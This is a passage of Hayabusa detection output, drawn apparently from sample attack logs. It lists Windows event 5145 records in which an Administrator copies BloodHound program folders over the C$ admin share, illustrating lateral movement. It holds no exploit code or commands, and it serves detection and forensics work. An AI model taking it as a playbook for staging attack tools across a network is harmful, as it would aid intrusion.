Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 